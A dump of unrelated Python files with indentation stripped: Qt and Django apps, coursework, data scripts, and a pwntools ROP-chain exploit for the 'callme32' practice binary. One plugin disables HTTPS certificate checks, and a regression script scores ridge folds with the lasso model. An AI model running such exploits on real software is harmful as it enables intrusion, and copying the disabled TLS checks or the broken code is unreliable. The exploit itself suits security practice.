list[27:42:3] = [99,99,99,99,99]
print("list = {}".format(list))
if __name__ == "__main__": main()
|
'''
Created on 1 abr. 2020
REVISTAS
@author: goyo
'''
from PyQt5 import QtCore, QtGui, QtWidgets
from ventanas import ventana_list_revistas, ventana_listado_revistas, ventana_menu_revistas, ventana_principal, ventana_registro_revistas , ventana_editar_revistas
from modulo.clases import Revista
from modulo import operaciones
from PyQt5.Qt import QMessageBox, QTableWidgetItem, QPushButton
import sys
from _functools import partial
lista_resultado = None
def registrar_revistas():
revista = Revista()
revista.titulo = ui_registrar_revistas.entrada_titulo_revista.text()
revista.precio = ui_registrar_revistas.entrada_precio_revista.text()
revista.distribuidora = ui_registrar_revistas.entrada_ditribuidor_revista.text()
revista.numero_revista = ui_registrar_revistas.entrada_numero_revista.text()
revista.date_entrega = ui_registrar_revistas.entrada_date_entrega.text()
revista.date_devolucion = ui_registrar_revistas.entrada_date_devolucion.text()
#revista.dascatalogado = ui_registrar_revistas.checbox_descatalogado.text()
if ui_registrar_revistas.checbox_descatalogado.isChecked():
revista.dascatalogado = True
indice_selecionado = ui_registrar_revistas.combo_extra.currentIndex()
revista.extra = ui_registrar_revistas.combo_extra.itemText(indice_selecionado)
#revista.periodicidad = ui_registrar_revistas.radio_semanal.text()
#revista.periodicidad = ui_registrar_revistas.radio_mensual.text()
#revista.periodicidad = ui_registrar_revistas.radio_anual.text()
if ui_registrar_revistas.radio_semanal.isChecked():
revista.periodicidad = "semanal"
if ui_registrar_revistas.radio_mensual.isChecked():
revista.periodicidad = "mensual"
if ui_registrar_revistas.radio_anual.isChecked():
revista.periodicidad = "anual"
try:
operaciones.registro_revistas(revista)
except Exception as e:
print(e)
QMessageBox.about(MainWindow,"Info","Registro de Revista OK")
def mostrar_registro_revistas():
ui_registrar_revistas.setupUi(MainWindow)
ui_registrar_revistas.entrada_registrar_revista.clicked.connect(registrar_revistas)
def mostrar_listado_revistas():
ui_listar_revistas.setupUi(MainWindow)
lista_resultados = operaciones.obtener_revista()
texto = ""
for l in lista_resultados:
texto +=("id :" + str(l[0]) + "titulo : " + l[1]
+ "precio : " + str(l[2]) + "distribidora : "
+ l[3] + "numero de revista : " + str(l[4])
+ "Fecha de entrega : " + str(l[5]) + "Fecha de devolucion :"
+ str(l[6]) + " Descatalogada : " + l[7] + " Extra : " + l[8]
+ " Periodicidad : " + l[9]+"\n")
ui_listar_revistas.listado_revistas.setText(texto)
ui_ventana_list_revistas.listWidget.itemClicked(mostrar_registro)
def mostrar_registro():
indice_selecionado = ui_ventana_list_revistas.listWidget.currentRow()
QMessageBox.about(MainWindow,"Info","mostrar la informacion del elemento : " + str(indice_selecionado))
def mostrar_list_widget():
global lista_resultado
ui_ventana_list_revistas.setupUi(MainWindow)
lista_resultado = operaciones.obtener_revista()
for l in lista_resultado:
ui_ventana_list_revistas.listWidget.addItem(" titulo : " + l[1] + " precio : "
+ str(l[2]) + " distribidora : " + l[3] + " numero de revista : "
+ str(l[4]) + " Fecha de entrega : " + str(l[5]) + " Fecha de devolucion : " + str(l[6]) +
" Descatalogada : " + l[7] + " Extra : " + l[8] + " Periodicidad : " + l[9])
ui_ventana_list_revistas.listWidget.itemClicked.connect(mostrar_registros)
def mostrar_registros():
indice_selecionado = ui_ventana_list_revistas.listWidget.currentRow()
texto = ""
texto += "titulo : " + lista_resultado[indice_selecionado][1]+"\n"
texto += "precio : " + str(lista_resultado[indice_selecionado][2])+"\n"
texto += "distribuidora : " + lista_resultado[indice_selecionado][3]+"\n"
texto += "numero de revista : " + str(lista_resultado[indice_selecionado][4])+"\n"
texto += "Fecha de entrega : " + str(lista_resultado[indice_selecionado][5])+"\n"
texto += "Fecha de devolucion : " + str(lista_resultado[indice_selecionado][6])+"\n"
texto += "Descatalogada : " + lista_resultado[indice_selecionado][7]+"\n"
texto += "Extra : " + lista_resultado[indice_selecionado][8]+"\n"
texto += "Periodicidad : " + lista_resultado[indice_selecionado][9]
QMessageBox.about(MainWindow,"Info",texto)
def mostrar_menu_revistas():
ui_ventana_menu_revistas.setupUi(MainWindow)
revistas = operaciones.obtener_revista()
fila = 0
for l in revistas:
ui_ventana_menu_revistas.tabla_revistas.insertRow(fila)
columna_indice = 0
for valor in l:
celda = QTableWidgetItem(str(valor))
ui_ventana_menu_revistas.tabla_revistas.setItem(fila,columna_indice,celda)
columna_indice += 1
boton_borrar = QPushButton("borrar")
boton_borrar.clicked.connect(partial(borrar_revista,l[0]))
ui_ventana_menu_revistas.tabla_revistas.setCellWidget(fila,7,boton_borrar)
boton_editar = QPushButton("editar")
boton_editar.clicked.connect(partial(editar_revistas,l[0],l[1]))
ui_ventana_menu_revistas.tabla_revistas.setCellWidget(fila,8,boton_editar)
fila +=1
def editar_revistas(id,titulo):
QMessageBox.about(MainWindow,"info","vas a editar el registro con id : " + str(id) + " titulo : " + titulo)
ui_ventana_editar_revistas.setupUi(MainWindow)
revista_a_editar = operaciones.obtener_revista_por_id(id)
ui_ventana_editar_revistas.entrada_titulo_revista.setText(revista_a_editar.titulo)
ui_ventana_editar_revistas.entrada_precio_revista.setText(str(revista_a_editar.precio))
ui_ventana_editar_revistas.entrada_ditribuidor_revista.setText(str(revista_a_editar.distribuidora))
ui_ventana_editar_revistas.entrada_numero_revista.setText(str(revista_a_editar.numero_revista))
ui_ventana_editar_revistas.entrada_date_entrega.setText(revista_a_editar.date_entrega)
ui_ventana_editar_revistas.entrada_date_devolucion.setText(revista_a_editar.date_devolucion)
ui_ventana_editar_revistas.boton_guardar_cambios_revista.clicked.connect(partial(guardar_cambios_revista,revista_a_editar.id))
def guardar_cambios_revista(id):
QMessageBox.about(MainWindow,"Info","guardar cambios sobre el registro de id :" + str(id))
revista_guardar_cambios = Revista()
revista_guardar_cambios.titulo = ui_ventana_editar_revistas.entrada_titulo_revista.text()
revista_guardar_cambios.precio = ui_ventana_editar_revistas.entrada_precio_revista.text()
revista_guardar_cambios.distribuidora = ui_ventana_editar_revistas.entrada_ditribuidor_revista.text()
revista_guardar_cambios.numero_revista = ui_ventana_editar_revistas.entrada_numero_revista.text()
revista_guardar_cambios.date_entrega = ui_ventana_editar_revistas.entrada_date_entrega.text()
revista_guardar_cambios.date_devolucion = ui_ventana_editar_revistas.entrada_date_devolucion.text()
revista_guardar_cambios.id = id
try:
operaciones.guardar_cambios_revista(revista_guardar_cambios)
except Exception as e:
print(e)
mostrar_menu_revistas()
def borrar_revista(id):
QMessageBox.about(MainWindow,"Info","vas a borrar un registro " + str(id))
operaciones.borrar_revista(id)
mostrar_menu_revistas()
def mostrar_inicio():
ui.setupUi(MainWindow)
ui.submenu_registrar_revistas.triggered.connect(mostrar_registro_revistas)
ui.submenu_listar_revistas.triggered.connect(mostrar_listado_revistas)
ui.submenu_inicio.triggered.connect(mostrar_inicio)
ui.submenu_list_widget.triggered.connect(mostrar_list_widget)
ui.submenu_table_widget.triggered.connect(mostrar_menu_revistas)
#end de funciones
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = ventana_principal.Ui_ventana_principal()
ui_registrar_revistas = ventana_registro_revistas.Ui_MainWindow()
ui_listar_revistas = ventana_listado_revistas.Ui_ventana_listado_revistas()
ui_ventana_list_revistas = ventana_list_revistas.Ui_MainWindow()
ui_ventana_menu_revistas = ventana_menu_revistas.Ui_MainWindow()
ui_ventana_editar_revistas = ventana_editar_revistas.Ui_MainWindow()
ui.setupUi(MainWindow)
ui.submenu_registrar_revistas.triggered.connect(mostrar_registro_revistas)
ui.submenu_listar_revistas.triggered.connect(mostrar_listado_revistas)
ui.submenu_inicio.triggered.connect(mostrar_inicio)
ui.submenu_list_widget.triggered.connect(mostrar_list_widget)
ui.submenu_table_widget.triggered.connect(mostrar_menu_revistas)
MainWindow.show()
sys.exit(app.exec_())
|
from django.contrib import messages
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import ListView, CreateView, UpdateView, DeleteView
from notes.forms import NotesForm
from notes.models import Notes
class NotesIndex(ListView):
model = Notes
context_object_name = 'all_notes'
template_name = 'notes/notes_index.html'
class CreateNotesView(CreateView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
class UpdateNotesView(UpdateView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
class DeleteNotesView(DeleteView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
def logout_request(request):
logout(request)
messages.info(request, "Logged out successfully!")
return redirect("login")
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=raw_password)
login(request, user)
return redirect('notes:index')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {'form': form})
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def findTarget(self, root, k):
"""
:type root: TreeNode
:type k: int
:rtype: bool
"""
result = self.helper_find_target(root, k)
print(result)
return True if result[1] else False
def helper_find_target(self, node, k, compliments=None, pairs=None):
"""
Helper function to traverse the tree and find the pairs
"""
if compliments is None and pairs is None:
# to store the compliments
compliments = set()
# to store all the pairs
pairs = []
if node is None:
return False, pairs
# check if node.val is in compliments set
if node.val in compliments:
pairs.append((node.val, k-node.val))
return True, pairs
# otherwise we add the val into the compliments
compliments.add(k-node.val)
left = self.helper_find_target(node.left, k, compliments, pairs)
right = self.helper_find_target(node.right, k, compliments, pairs)
return left or right
root = TreeNode(4)
root.left = TreeNode(2)
root.right = TreeNode(6)
root.left.left = TreeNode(1)
root.left.right = TreeNode(3)
root.right.left = TreeNode(5)
root.right.right = TreeNode(18)
tree = Solution()
result = tree.findTarget(root, 19)
print(result)
|
#!/home/boyuanli/tools/anaconda2/envs/python35/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 25 16:34:27 2019
@author: lbybyl
this file is used to find most max 50 bp window; so the stastic to find
sig promoter and stastic the paused sig for the 50bp windows, you should
used R, becaused R more convenient
input: the sig promoter has been select by R
"""
import click
import os.path
import sys
import os
import pandas as pd
import numpy as np
@click.command()
@click.option('--inputfile', "-i", required=True , help='the input file name you want find max 50bp window')
@click.option('--outputprefix', "-p", required=True ,help='output prefix')
#@click.option('--first-par', "-a", default = "" , help='should be Var_name,Short_name,is_requrie,type [optional]')
def main(inputfile, outputprefix):
"""
inputfile example:
chr1 4806822 4808822 NM_008866 0 + chr1 4806822 4806847 26 0 + 25
it was got by the bedtools intersect for the promoter region and reads;
it used to find the max 50kp window and it's reads num for file like up;
"""
filname=inputfile
outputname=outputprefix
file = open(filname,'r')
gene_dir = {}
gene_info = {}
line_split = []
for line in file:
line_split = line.split('\t')
if line_split[5]=="+":
try:
gene_dir[line_split[3]].append(line_split[7])
except KeyError:
gene_info[line_split[3]] = line_split[0:6]
gene_dir[line_split[3]] = [line_split[7]]
elif line_split[5]=="-":
try:
gene_dir[line_split[3]].append(line_split[8])
except KeyError:
gene_info[line_split[3]] = line_split[0:6]
gene_dir[line_split[3]] = [line_split[8]]
file.close()
"""
plus 400 num into the list coresponding to each gene
and the find the most sig 50 bp for the active promoter
now you have two dict; one contain every gene's mapping reads loc;
another contain every gene's common info,such as chr,st,en,id,0,strand
process: for each gene, append 400 elements into the list,and sort it, got
the index of the elements you append, and substract them with the window/strp as
step, and got the max value for substract list;
and got the index, the st_region=gene_st*(index+1) en_region=gene_st*(index+1)+50
output: format the 50 bp region data to chr,st,en,id,0,strand,reads_num
"""
sp=5 # sliding steps
windwos=10 # 10*sp
gene_window = {}
gene_window_readsnum = {}
gene_max_window = {}
for i in gene_dir.keys():
try:
ex_list=produce_list(gene_info[i][1],gene_info[i][2],sp)
except IndexError:
print('i=',i)
print(gene_info[i])
print(gene_info[i])
sys.exit(3)
try:
gene_dir[i] = gene_dir[i] + ex_list
gene_dir[i]=list(map(int,gene_dir[i]))
gene_dir[i].sort()
except AttributeError:
print(gene_dir[i])
sys.exit(4)
except TypeError:
print(type(gene_dir[i]))
print(gene_dir[i])
sys.exit(4.1)
try:
gene_window[i]=got_eleindex_for_list(gene_dir[i],ex_list)
except TypeError:
print('i=',i)
print(gene_dir[i])
sys.exit(5)
try:
gene_window_readsnum[i]=got_list_diff(gene_window[i],windwos)
except TypeError:
print(gene_window[i])
print(type(gene_window[i]))
sys.exit(7)
gene_max_window[i]=[max(gene_window_readsnum[i])]
max_idx=gene_window_readsnum[i].index(max(gene_window_readsnum[i]))
wi_st=int(gene_info[i][1])+(max_idx+1)*sp
tmp_list=[gene_info[i][0],wi_st,wi_st+50,gene_info[i][3],gene_info[i][4],gene_info[i][5]]
gene_max_window[i]=gene_max_window[i]+tmp_list
save_file(gene_max_window,outputname)
def produce_list(st,en,sp):
st=int(st)
en=int(en)
li = [x for x in range(st,en+sp,sp)]
return li
def got_eleindex_for_list(li_all,li_sub):
"""
input a list and a sub list and return the elements index of
the sulist in the list
"""
li_index=[]
li_all=list(map(int,li_all))
for i in li_sub:
li_index.append(li_all.index(i))
return li_index
def got_list_diff(li,sp):
li_diff=[]
len_li=len(li)
for i in range(0,len_li):
if i+sp < len_li:
li_diff.append(li[i+sp]-li[i]-sp)
return li_diff
def save_file(dict_data,outputname):
dict_data_df = pd.DataFrame(dict_data)
dict_data_df = dict_data_df.T
dict_data_df.to_csv(outputname,index=False,sep="\t")
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from .plugin import SauceLabs
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
__all__ = ["SauceLabs"]
|
#*_* coding=utf8 *_*
#!/usr/bin/env python
backend_list = [("9pk.118sh.com", "113.105.175.243")]
BACKEND_DICT = dict()
AccessList = map(lambda x:x[0], backend_list)
def get_backend(host):
return BACKEND_DICT.get(host)
def init():
for (host, ip) in backend_list:
BACKEND_DICT.setdefault(host, ip)
init()
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
elf = ELF('callme32')
callme_one = elf.symbols['callme_one']
callme_two = elf.symbols['callme_two']
callme_three = elf.symbols['callme_three']
# ROPGadget --binary callme32
pop3ret = 0x080488a9 # pop esi ; pop edi ; pop ebp ; ret
if __name__ == '__main__':
proc = elf.process()
payload = 11 * b'AAAA'
payload += p32(callme_one)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
payload += p32(callme_two)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
payload += p32(callme_three)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
proc.recvuntil('>')
proc.sendline(payload)
proc.recvall()
|
# import time
# user_data = {}
# for i in range(10000):
# activity = input("Login or Sign up?\n>>").lower()
# if activity == 'login':
# email = input("Enter your email\n>>")
# password = input("Enter your password\n>>")
# time.sleep(2)
# if email in user_data.keys():
# actual_password = user_data.get(email)
# if actual_password == password:
# print('Login successful')
# break
# else:
# print("Please enter a valid email and password.")
# else:
# print("There is no active user with thie email")
# elif activity == 'sign up':
# for i in range(10000):
# email = input("Enter your email\n>>")
# password = input("Enter your password\n>>")
# re_password = input("Confirm password \n>>")
# special_char = ['#', '@', '$']
# isValid = True
# if password != re_password:
# print("Please enter matching passwords")
# continue
# if (len(password) < 6) or (len(password) > 16):
# print ("Password length should not be less than 6")
# isValid = False
# elif not any(char.isdigit() for char in password):
# print("Password should at least contain a number")
# isValid = False
# elif not any(char.islower() for char in password):
# print("Password should contain at least a lowercase letter [a-z]")
# isValid = False
# elif not any(char.isupper() for char in password):
# print("Password should contain at least an uppercase letter [A-Z]")
# isValid = False
# elif not any(char in special_char for char in password):
# print("Password should contain at least a special character [@#$]")
# isValid = False
# continue
# else:
# user_data[email] = password
# break
# con = input("Press 'y' to continue and any other key to quit\n>>")
# if con == 'y':
# continue
# else:
# break
# else:
# print("Please select a valid option")
|
# -*- coding: utf-8 -*-
#############################################################################
# Copyright Vlad Popovici <popovici@bioxlab.org>
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
__author__ = "Vlad Popovici <popovici@bioxlab.org>"
__version__ = 0.1
import argparse as opt
import numpy as np
import glob
import os, os.path
import logging
import warnings
import re
from skimage.io import imread, imsave
import qpath.stain.norm
from qpath.core import NumpyImage
warnings.simplefilter("ignore", UserWarning)
def main():
p = opt.ArgumentParser(description="Builds a stain normalization model based on a set of example images.")
p.add_argument("img_path", action="store", help="an image or a folder images (jpeg, tiff or png) to be normalized")
p.add_argument("model_file", action="store", help="file with the normalization model")
p.add_argument("dst_path", action="store", help="destination folder where to save the image(s)")
p.add_argument("-m", "--method", action="store", choices=["macenko", "vahadane", "reinhard"],
default="reinhard", help="normalization method")
p.add_argument("-p", "--prefix", action="store", default="",
help="add a prefix to the name of the normalized image (helpful when saving in the same folder)")
args = p.parse_args()
logging.captureWarnings(True)
logger = logging.getLogger('QPATH')
logger.setLevel(logging.DEBUG)
logger_handler = logging.FileHandler(args.dst_path + os.path.sep + 'qpath.log')
logger_handler.setLevel(logging.DEBUG)
logger.addHandler(logger_handler)
logger.info("========= Apply HE normalization model =========")
flist = list()
if os.path.isdir(args.img_path):
logger.info("Processing all images in " + args.img_path)
flist.extend(glob.glob(args.img_path + os.path.sep + "*.jpeg"))
flist.extend(glob.glob(args.img_path + os.path.sep + "*.tiff"))
flist.extend(glob.glob(args.img_path + os.path.sep + "*.png"))
logger.info("Found {:d} images".format(len(flist)))
elif os.path.exists(args.img_path) and (args.img_path.endswith(".jpeg") or
args.img_path.endswith(".png") or args.img_path.endswith(".tiff")):
logger.info("Single image to process.")
flist = [args.img_path]
else:
raise RuntimeError("Cannot find the specified folder/file.")
# read model:
nrm = None
if args.method.lower() == "macenko":
nrm = qpath.stain.norm.MacenkoNormalizer()
elif args.method.lower() == "vahadane":
nrm = qpath.stain.norm.VahadaneNormalizer()
elif args.method.lower() == "reinhard":
nrm = qpath.stain.norm.ReinhardNormalizer()
else:
logger.info("Unknown normalizer")
raise RuntimeError("Unknown normalizer")
nrm.load(args.model_file)
for f in flist:
img = imread(f)
img_n = nrm.apply(img)
imsave(args.dst_path + os.path.sep + args.prefix + os.path.basename(f), img_n)
return
if __name__ == "__main__":
main()
|
#!/usr/bin/python3
# syntax.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
print("This is the syntax.py file.")
#Gives the ability to call the fuction before their defined
#Basicly it calls main at the end of the file, so by then all
#functions will be declared
if __name__ == "__main__": main()
|
import itertools
from tqdm import tqdm
def play(num_players, last_marble):
players = itertools.cycle(range(num_players))
scores = [0 for _ in range(num_players)]
current_player = next(players)
marbles = [0]
current_index = 0
for marble in tqdm(range(1, last_marble + 1)):
current_player = next(players)
if marble % 23 == 0:
remove_index = (current_index - 7) % len(marbles)
scores[current_player] += marble + marbles.pop(remove_index)
current_index = remove_index
else:
next_index = (current_index + 2) % len(marbles)
marbles.insert(next_index, marble)
current_index = next_index
return max(scores)
def part_1():
# return play(9, 25)
# return play(10, 1618)
return play(411, 71170)
def part_2():
return play(411, 71170 * 100)
if __name__ == '__main__':
print(f'Part 1: {part_1()}')
print(f'Part 2: {part_2()}')
|
import numpy as np
import pandas as pd
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from sklearn.linear_model import Lasso
from sklearn.preprocessing import PolynomialFeatures
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
df = pd.read_csv("week3.csv")
print(df.head())
x = np.array(df.iloc[:, 0:2])
x1 = np.array(df.iloc[:, 0]) #to plot the x_axis
x2 = np.array(df.iloc[:, 1])
y = np.array(df.iloc[:, 2])
#plot original data
fig1 = plt.figure(figsize=(17,12))
ax = fig1.add_subplot(111, projection='3d')
ax.scatter(x1, x2, y, label='original data', color='red')
plt.title("original data")
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
#plt.show()
poly = PolynomialFeatures(degree=5, interaction_only=False,include_bias=False)
x_poly = poly.fit_transform(x)
#(c)
""" Because original data x1,x2 lies in (-1,1),
so I choose to generate array of range (-1,1), and then use PolynomialFeatures to transform the Xtest."""
Xtest =[]
grid=np.linspace(-1.5,1.5) #Return evenly spaced numbers over a specified interval.
for i in grid:
for j in grid:
Xtest.append([i,j])
Xtest=np.array(Xtest)
poly_test = PolynomialFeatures(degree=5, interaction_only=False,include_bias=False)
x_poly_test = poly_test.fit_transform(Xtest)
fig2=plt.figure(figsize=(17,12))
"""Then I define a figure object to plot all the models using add_subplot function.
The value of z axis is the prediction of lasso when input is the Xtest transformed ."""
#train the range of different alpha for linear lasso regression model
for inx,C in enumerate([0.001,0.01,0.1,1,10,100,1000]):
alpha=1/C
linlasso = Lasso(alpha=alpha,max_iter=9999).fit(x_poly, y)
print('when C is {0},intercept is {1},coef is{2},the score is {3:.4f}\n'.format(C,
linlasso.intercept_, linlasso.coef_,
linlasso.score(x_poly, y)))
y_pre_test = linlasso.predict(x_poly_test)
y_pre_test = y_pre_test.reshape(1,-1)
ax = fig2.add_subplot(2,4,inx+1,projection='3d')
ax.scatter(Xtest[:,0], Xtest[:,1], y_pre_test, label="lasso regression", color='blue',s=1)
ax.plot_surface(Xtest[:,0], Xtest[:,1], y_pre_test)
ax.scatter(x1, x2, y, label="original data", color='red',s=1)
plt.title("C={0}".format(C))
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
#plt.show()
#d
fig3=plt.figure(figsize=(17,12))
for inx,C in enumerate([0.001,0.01,0.1,1,10,100,1000]):
alpha=1/(2*C)
rige = Ridge(alpha=alpha,max_iter=9999).fit(x_poly, y)
print('when C is {0},intercept is {1},coef is{2},the score is {3:.4f}\n'.format(C,
rige.intercept_,
rige.coef_,
rige.score(x_poly, y)))
y_pre_test = rige.predict(x_poly_test)
y_pre_test = y_pre_test.reshape(1,-1)
ax = fig3.add_subplot(2,4,inx+1,projection='3d')
ax.scatter(Xtest[:,0], Xtest[:,1], y_pre_test, label="ridge regression", color='blue',s=1)
ax.plot_surface(Xtest[:,0], Xtest[:,1], y_pre_test)
ax.scatter(x1, x2, y, label="original data", color='red',s=1)
plt.title("C={0}".format(C))
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
#First I define 4 arrays in case to store the mean ,
# standard deviation , variance and the number of K perspectively.
mean_kfold_mse = []
standard_deviation_kfold_mse = []
variance_kfold_mse=[]
kfold1=[2,3,4,5,6,7,8,9,10,25,50,100]
mean_score_kfold=[]
linlasso1 = Lasso(alpha=1, max_iter=9999).fit(x_poly, y)
for i in kfold1:
mean_score_kfold.append(cross_val_score(linlasso1,x_poly,y,cv=i).mean())
kfold=[2,5,10,25,50,100]
#And in each iteration of kfold , and inside the each split , get the list of value of mse, and outside each split
# get the variance, mean, standard deviation of each K-fold’s MSE.
for inx,n_splits in enumerate(kfold):
kf = KFold(n_splits=n_splits)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
print('{0} of folds,the mean of the mse:{1}, the var of the mse:{2}'.format(n_splits, np.mean(mse), np.var(mse)))
variance_kfold_mse.append(np.var(mse))
mean_kfold_mse.append(np.mean(mse))
standard_deviation_kfold_mse.append(np.std(mse))
#Then I create a new figure object to draw using plot and errorbar function for each subplot .
fig4=plt.figure(figsize=(17,12))
plt.subplot(131)
plt.plot(kfold, mean_kfold_mse,label='MSE',color='red')
plt.plot(kfold, variance_kfold_mse,label='variance',color='blue')
plt.title('Mean square error and variance')
plt.xlabel('K')
plt.legend(loc='upper right',fontsize=5)
plt.subplot(132)
plt.errorbar(kfold, mean_kfold_mse,label='MSE',color='red',yerr=standard_deviation_kfold_mse)
plt.title('Mean square error')
plt.xlabel('K')
plt.legend(loc='upper right',fontsize=5)
#plot the mean scores of each K
plt.subplot(133)
plt.plot(kfold1,mean_score_kfold,label='mean scores',color='red')
plt.xlabel('K')
plt.title('the scores of different K')
plt.legend(loc='upper right',fontsize=5)
fig5 = plt.figure(figsize=(17,12))
c_range=[0.01,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.2,1.5,1.8,2]
c_mean_mse1 = []
c_std_mse1 = []
c_mean_mse2 = []
c_std_mse2 = []
#when K=5
for inx, C in enumerate(c_range):
kf = KFold(n_splits=5)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1 / C, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse1.append(np.mean(mse))
c_std_mse1.append(np.std(mse))
#when K=10
for inx, C in enumerate(c_range):
kf = KFold(n_splits=10)
mse = []
for train, test in kf.split(x_poly):
linlasso = Lasso(alpha=1 / C, max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse2.append(np.mean(mse))
c_std_mse2.append(np.std(mse))
plt.errorbar(c_range, c_mean_mse2, label='K=10', color='blue', yerr=c_std_mse2)
plt.errorbar(c_range, c_mean_mse1, label='K=5', color='red', yerr=c_std_mse1)
plt.ylabel('Mean square error')
plt.xlabel('C')
plt.legend(loc='upper right',fontsize=5)
#(ii)(d)
#ridge model
#when K=5
fig6=plt.figure(figsize=(17,12))
c_range1=[0.001,0.01,0.1,1,10,100,1000]
c_mean_mse3 = []
c_std_mse3 = []
c_mean_mse4 = []
c_std_mse4 = []
for inx, C in enumerate(c_range1):
kf = KFold(n_splits=5)
mse = []
for train, test in kf.split(x_poly):
ridge = Ridge(alpha=1 / (2*C), max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse3.append(np.mean(mse))
c_std_mse3.append(np.std(mse))
#when K=10
for inx, C in enumerate(c_range1):
kf = KFold(n_splits=10)
mse = []
for train, test in kf.split(x_poly):
ridge = Ridge(alpha=1 / (2*C), max_iter=9999).fit(x_poly[train], y[train])
ypred = linlasso.predict(x_poly[test])
from sklearn.metrics import mean_squared_error
mse.append(mean_squared_error(ypred, y[test]))
c_mean_mse4.append(np.mean(mse))
c_std_mse4.append(np.std(mse))
#draw the MSE with different C and K
plt.errorbar(c_range1, c_mean_mse4, label='K=10', color='blue', yerr=c_std_mse4)
plt.errorbar(c_range1, c_mean_mse3, label='K=5', color='red', yerr=c_std_mse3)
plt.ylabel('Mean square error')
plt.title('ridge regression model')
plt.xlabel('C')
plt.legend(loc='upper right',fontsize=5)
#draw the mean scores of different C using ridge model
fig7=plt.figure(figsize=(17,12))
mean_score_crange=[]
crange_ridge = [0.01,0.1,0.3,0.5,0.7,1,2,4,6,10]
for c in crange_ridge:
ridge = Ridge(alpha=1/(2*c), max_iter=9999).fit(x_poly, y)
mean_score_crange.append(cross_val_score(ridge, x_poly, y, cv=5).mean())
plt.plot(crange_ridge,mean_score_crange,label='mean scores',color='red')
plt.xlabel('C')
plt.title('the scores of different C')
plt.legend(loc='upper right',fontsize=5)
plt.show()
|
"""
Сложность:
1. Худший случай: O(n^2) - когда нужно расставить элементы по возрастанию,
а они расположены по убыванию. O(n^2) даёт итерация по 2 циклам: внешний
цикл (сложность которого равна O(n)) мы умножаем на внутренний (он тоже
равен O(n)). O(n * n) = O(n^2)
2. Лучший случай: O(n) - когда все элементы расположены по возрастанию.
Сложность получается из-за того, что имеется переменная swapped,
которая позволяет прервать алгоритм, если не было осуществлено ни одной
перестановки за цикл, соответвенно для внутреннего цикла будет O(1), т.к.
проходимся только один раз, и после swapped=False выходим. Итого:
O(n) * O(1) = O(n)
3. Средний случай: O(n^2).
"""
def bubble_sort(collection):
"""
Реализация пузырьковой сортировки.
:param collection: любая изменяемая коллекция с гетерогенными элементами,
которые можно сравнивать.
:return: коллекция с элементами, расположенными по возрастанию.
Examples:
>>> bubble_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> bubble_sort([])
[]
>>> bubble_sort([-2, -5, -45])
[-45, -5, -2]
>>> bubble_sort([-23, 0, 6, -4, 34])
[-23, -4, 0, 6, 34]
>>> bubble_sort([-23, 0, 6, -4, 34]) == sorted([-23, 0, 6, -4, 34])
True
"""
length = len(collection)
# Сортировка предпологает прохождение по всей коллекции. Внешний цикл
# занимается как раз итерацией через все элементы. i - это счётчик
# элементов, которые уже были отсортированы, потому что внутренний цикл
# за одну проходку сравнивает все соседние числа. Соответственно на
# каждой итерации будет появляться 1 отсортированный элемент. Он будет
# перемещён в конец, так как мы сортируем по возрастанию.
for i in range(length - 1):
# Данная переменная нужна в качестве флага, который показывает,
